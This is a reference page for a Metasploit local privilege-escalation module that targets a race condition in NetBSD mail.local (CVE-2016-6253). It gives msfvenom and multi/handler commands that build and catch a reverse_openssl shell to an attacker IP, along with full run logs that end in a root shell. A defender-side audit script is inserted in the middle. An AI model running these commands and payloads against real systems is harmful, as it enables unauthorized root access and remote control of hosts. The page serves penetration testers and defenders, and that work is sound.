NetBSD mail.local Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/unix/local/netbsd_mail_local Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: NetBSD mail.local Privilege Escalation
Module: exploit/unix/local/netbsd_mail_local
Source code: modules/exploits/unix/local/netbsd_mail_local.rb
Disclosure date: 2016-07-07
Last modification time: 2021-01-21 19:59:29 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2016-6253

This module attempts to exploit a race condition in mail.local with the SUID bit set on NetBSD 7.0 - 7.0.1 (verified on 7.0.1), NetBSD 6.1 - 6.1.5 and NetBSD 6.0 - 6.0.6. Successful exploitation relies on a crontab job with root privileges, which may take up to 10 minutes to execute.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/unix/local/netbsd_mail_local
msf exploit(netbsd_mail_local) > show targets
    ... a list of targets ...
msf exploit(netbsd_mail_local) > set TARGET target-id
msf exploit(netbsd_mail_local) > show options
    ... show and set options ...
msf exploit(netbsd_mail_local) > set SESSION session-id
msf exploit(netbsd_mail_local) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


NetBSD 7.0.1 is available from the official site, or on an unofficial git

Issues


Getting an initial shell that can write files correctly was difficult. The best I found was reverse_openssl.

Payloads that didn't work:

  • cmd/unix/reverse - connected back, but couldn't write file.

    [*] Started reverse TCP double handler on 172.16.152.1:4444
    [*] Writing Payload to /tmp/zrWqhXpL
    [*] Max line length is 131073
    [*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
    [-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data
    [*] Exploit completed, but no session was created.

  • cmd/unix/reverse_awk - awk: syntax error at source line 1
  • cmd/unix/reverse_bash - ./bsd.payload: 1: Syntax error: Bad fd number
  • cmd/unix/reverse_bash_telnet_ssl - $ telnet: unknown option -- z
  • cmd/unix/reverse_ssl_double_telnet - $ telnet: unknown option -- z
  • cmd/unix/reverse_lua - lua: (command line):1: module 'socket' not found
  • netcat, node, perl, php, python, ruby, zsh - all not installed by default
  • bsd/* didn't seem to work either, maybe it's for FreeBSD?

Payloads that did work:

  • cmd/unix/reverse_openssl

Verification Steps


  1. Start msfconsole
  2. Get an initial shell
    1. Create a working shell and scp it over:
       ./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
       scp /tmp/bsd.payload [email protected]:/tmp/
    2. Set up msf to handle it:
       use exploit/multi/handler
       set payload cmd/unix/reverse_openssl
       set lhost 172.16.152.1
       exploit
    3. Run the shell from NetBSD:
       $ cd /tmp
       $ ls
       bsd.payload
       $ chmod +x bsd.payload
       $ ./bsd.payload
       $ WARNING: can't open config file: /etc/openssl/openssl.cnf
       depth=0 CN = vgekg
       verify error:num=18:self signed certificate
       verify return:1
       depth=0 CN = vgekg
       verify return:1
    4. Receive the shell and background it:
       [*] Started reverse double SSL handler on 172.16.152.1:4444
       [*] Starting the payload handler...
       [*] Accepted the first client connection...
       [*] Accepted the second client connection...
       [*] Command: echo NwNHAEiJioYIvn4M;
       [*] Writing to socket A
       [*] Writing to socket B
       [*] Reading from sockets...
       [*] Reading from socket A
       [*] A: "NwNHAEiJioYIvn4M\n"
       [*] Matching...
       [*] B is input...
       [*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
       ^Z
       Background session 1? [y/N]  y
  3. Do: use exploit/unix/local/netbsd_mail_local
  4. Do: set payload cmd/unix/reverse_openssl
  5. Do: set lhost 172.16.152.1
  6. Do: set verbose true
  7. Do: set session 1
  8. Do: exploit
  9. You should get a root shell.

Options


ATRUNPATH File location of atrun, defaults to /usr/libexec/atrun

MAILDIR Location of mail folder, defaults to /var/mail

WritableDir Location of a writable directory for our payload, defaults to /tmp

ListenerTimeout Since this exploit relies on a cron job that runs on a 10-minute timer, the listener timeout needs to be 10 minutes plus padding. Defaults to 603 seconds (10 min, 3 sec).
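The options above name the files this exploit touches, and the run log later on this page ends with the module's own reminder to run chown root:wheel /usr/libexec/atrun and its warnings that the dropped X.c, X and X.out files in WritableDir may need manual cleanup. The following POSIX shell script is an added defender-side integrity check written for this page; it is not part of the Metasploit module or of NetBSD. It verifies that the binary at ATRUNPATH is still owned root:wheel and not group- or world-writable, reports whether mail.local carries the SUID bit (the precondition the description states), and lists leftover name/name.c/name.out triples in WritableDir. The mail.local path /usr/libexec/mail.local is an assumption about the NetBSD install layout, and the artifact-triple pattern is inferred from the run log on this page rather than from the module source.

```shell
#!/bin/sh
# Added defender-side check for hosts in the NetBSD range the module targets.
# Not the Metasploit module's code: it only audits the files the module touches.
# `ls -ld` is parsed instead of stat(1) because stat's format flags differ
# between NetBSD (-f) and GNU coreutils (-c), while ls -l output is POSIX.

# mode_string PATH -> the 10-character permission string (e.g. -r-sr-xr-x),
# with any trailing ACL/xattr marker such as '+' or '.' cut off.
mode_string() {
    ls -ld "$1" 2>/dev/null | awk '{print substr($1, 1, 10)}'
}

# owner_group PATH -> "owner:group" as ls resolves them.
owner_group() {
    ls -ld "$1" 2>/dev/null | awk '{print $3 ":" $4}'
}

# is_setuid PATH -> exit 0 when the setuid bit is set (column 4 is s or S).
is_setuid() {
    case "$(mode_string "$1")" in
        ???[sS]??????) return 0 ;;
    esac
    return 1
}

# is_group_or_world_writable PATH -> exit 0 when group (column 6) or other
# (column 9) has write permission.
is_group_or_world_writable() {
    case "$(mode_string "$1")" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# check_root_binary PATH OWNER GROUP -> exit 0 when PATH exists, is owned by
# OWNER:GROUP and is not writable by group or other; prints a finding and
# exits 1 otherwise. The module's output reminds the operator to
# "chown root:wheel /usr/libexec/atrun", so ownership drift is what to look for.
check_root_binary() {
    path=$1; want="$2:$3"
    if [ ! -e "$path" ]; then
        echo "FINDING: $path is missing"; return 1
    fi
    have=$(owner_group "$path")
    if [ "$have" != "$want" ]; then
        echo "FINDING: $path is owned by $have, expected $want"; return 1
    fi
    if is_group_or_world_writable "$path"; then
        echo "FINDING: $path is group- or world-writable ($(mode_string "$path"))"
        return 1
    fi
    return 0
}

# leftover_artifacts DIR -> prints each base name N in DIR for which both N.c
# and N.out exist. The run log shows the module dropping X.c, compiling it to
# X and writing X.out in WritableDir, then warning that cleanup may be manual.
# (Assumed pattern; inferred from the log, not from the module source.)
leftover_artifacts() {
    for src in "$1"/*.c; do
        [ -f "$src" ] || continue
        base=${src%.c}
        if [ -f "$base.out" ]; then echo "$base"; fi
    done
    return 0
}

# audit ATRUN MAILLOCAL WRITABLEDIR [OWNER] [GROUP] -> runs all checks and
# returns the number of integrity findings (0 = nothing to report). SUID on
# mail.local is reported as exposure rather than counted as a finding,
# because that is the shipped configuration on unpatched systems.
audit() {
    owner=${4:-root}; group=${5:-wheel}
    findings=0
    check_root_binary "$1" "$owner" "$group" || findings=$((findings + 1))
    if is_setuid "$2"; then
        echo "INFO: $2 is setuid; confirm NetBSD-SA2016-006 has been applied"
    fi
    for a in $(leftover_artifacts "$3"); do
        echo "FINDING: possible leftover exploit artifacts $a.c $a $a.out"
        findings=$((findings + 1))
    done
    return "$findings"
}

# Usage on a NetBSD host with the module's default option values
# (/usr/libexec/mail.local is an assumed path):
#   audit /usr/libexec/atrun /usr/libexec/mail.local /tmp
```

Run it as root so ls can read every path; a non-zero exit status is the number of findings, which makes it easy to wire into a cron-driven host check. Because the exploit depends on the root cron job that runs atrun, an atrun binary that is no longer root:wheel or has become writable is the clearest on-host indicator that this module, or something like it, has been run.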

Scenarios


Here is a run against a virgin install of NetBSD 7.0.1 (NetBSD 7.0.1 (GENERIC.201605221355Z) amd64, from the unofficial link at the top).

In this example, I got lucky and only had to wait ~1 min for the cron to hit, which runs every 10 min by default.

  1. Get an initial shell
    1. Create a working shell and scp it over:
       ./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
       scp /tmp/bsd.payload [email protected]:/tmp/
    2. Set up msf to handle it:
       use exploit/multi/handler
       set payload cmd/unix/reverse_openssl
       set lhost 172.16.152.1
       exploit
    3. Run the shell from NetBSD:
       $ cd /tmp
       $ ls
       bsd.payload
       $ chmod +x bsd.payload
       $ ./bsd.payload
       $ WARNING: can't open config file: /etc/openssl/openssl.cnf
       depth=0 CN = vgekg
       verify error:num=18:self signed certificate
       verify return:1
       depth=0 CN = vgekg
       verify return:1
    4. Receive the shell and background it:
       [*] Started reverse double SSL handler on 172.16.152.1:4444
       [*] Starting the payload handler...
       [*] Accepted the first client connection...
       [*] Accepted the second client connection...
       [*] Command: echo NwNHAEiJioYIvn4M;
       [*] Writing to socket A
       [*] Writing to socket B
       [*] Reading from sockets...
       [*] Reading from socket A
       [*] A: "NwNHAEiJioYIvn4M\n"
       [*] Matching...
       [*] B is input...
       [*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
       ^Z
       Background session 1? [y/N]  y
  2. Run the exploit:
     msf exploit(netbsd_mail_local) > set payload cmd/unix/reverse_openssl
     payload => cmd/unix/reverse_openssl
     msf exploit(netbsd_mail_local) > set lhost 172.16.152.1
     lhost => 172.16.152.1
     msf exploit(netbsd_mail_local) > set verbose true
     verbose => true
     msf exploit(netbsd_mail_local) > set session 1
     session => 1
     msf exploit(netbsd_mail_local) > exploit
     [*] Started reverse double SSL handler on 172.16.152.1:4444
     [*] Writing Payload to /tmp/pjDkvmGg
     [*] Max line length is 131073
     [*] Writing 176 bytes in 1 chunks of 618 bytes (octal-encoded), using printf
     [*] Writing exploit to /tmp/GHIKGOWX.c
     [*] Max line length is 131073
     [*] Writing 4898 bytes in 1 chunks of 17162 bytes (octal-encoded), using printf
     [*] Compiling /tmp/GHIKGOWX.c via gcc
     [*] Starting the payload handler...
     [*] Executing at 2016-08-25 19:59:04 -0400. May take up to 10min for callback
     [*] Accepted the first client connection...
     [*] Accepted the second client connection...
     [*] Command: echo X6C4UIDx4zmwM0DJ;
     [*] Writing to socket A
     [*] Writing to socket B
     [*] Reading from sockets...
     [*] Reading from socket A
     [*] A: "X6C4UIDx4zmwM0DJ\n"
     [*] Matching...
     [*] B is input...
     [*] Command shell session 2 opened (172.16.152.1:4444 -> 172.16.152.128:65532) at 2016-08-25 20:00:02 -0400
     [*] 2016-08-25 20:00:02 -0400
     [*] Remember to run: chown root:wheel /usr/libexec/atrun
     [+] Deleted /tmp/pjDkvmGg
     [!] This exploit may require manual cleanup of '/tmp/pjDkvmGg' on the target
     [!] This exploit may require manual cleanup of '/tmp/GHIKGOWX' on the target
     [!] This exploit may require manual cleanup of '/tmp/GHIKGOWX.out' on the target

     1633029467
     TkBWZEPqsRvYvmwNaTcjImhcSzZHOAtY
     true
     JUqfyioWthnpvyxRJAZosSGQjnLHqPUB
     sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr
     nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx
     whoami
     root


Msfconsole Usage


Here is how the unix/local/netbsd_mail_local exploit module looks in the msfconsole:

msf6 > use exploit/unix/local/netbsd_mail_local

msf6 exploit(unix/local/netbsd_mail_local) > show info

       Name: NetBSD mail.local Privilege Escalation
     Module: exploit/unix/local/netbsd_mail_local
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-07-07

Provided by:
  h00die <[email protected]>
  akat1

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  No

Basic options:
  Name             Current Setting     Required  Description
  ----             ---------------     --------  -----------
  ATRUNPATH        /usr/libexec/atrun  yes       Location of atrun binary
  ListenerTimeout  603                 yes       Number of seconds to wait for the exploit
  MAILDIR          /var/mail           yes       Location of mailboxes
  SESSION                              yes       The session to run this module on.
  WritableDir      /tmp                yes       A directory where we can write files

Payload information:

Description:
  This module attempts to exploit a race condition in mail.local with 
  SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 - 
  6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab 
  job with root privilege, which may take up to 10min to execute.

References:
  http://akat1.pl/?id=2
  https://www.exploit-db.com/exploits/40141
  https://nvd.nist.gov/vuln/detail/CVE-2016-6253
  http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc

Module Options


This is a complete list of options available in the unix/local/netbsd_mail_local exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show options

Module options (exploit/unix/local/netbsd_mail_local):

   Name             Current Setting     Required  Description
   ----             ---------------     --------  -----------
   ATRUNPATH        /usr/libexec/atrun  yes       Location of atrun binary
   ListenerTimeout  603                 yes       Number of seconds to wait for the exploit
   MAILDIR          /var/mail           yes       Location of mailboxes
   SESSION                              yes       The session to run this module on.
   WritableDir      /tmp                yes       A directory where we can write files

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the unix/local/netbsd_mail_local exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show advanced

Module advanced options (exploit/unix/local/netbsd_mail_local):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                603              no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/local/netbsd_mail_local module can exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/local/netbsd_mail_local exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show payloads

Compatible Payloads
===================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  payload/cmd/unix/generic                           normal  No     Unix Command, Generic Command Execution
   1  payload/cmd/unix/reverse_openssl                   normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)

Evasion Options


Here is the full list of possible evasion options supported by the unix/local/netbsd_mail_local exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/local/netbsd_mail_local) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
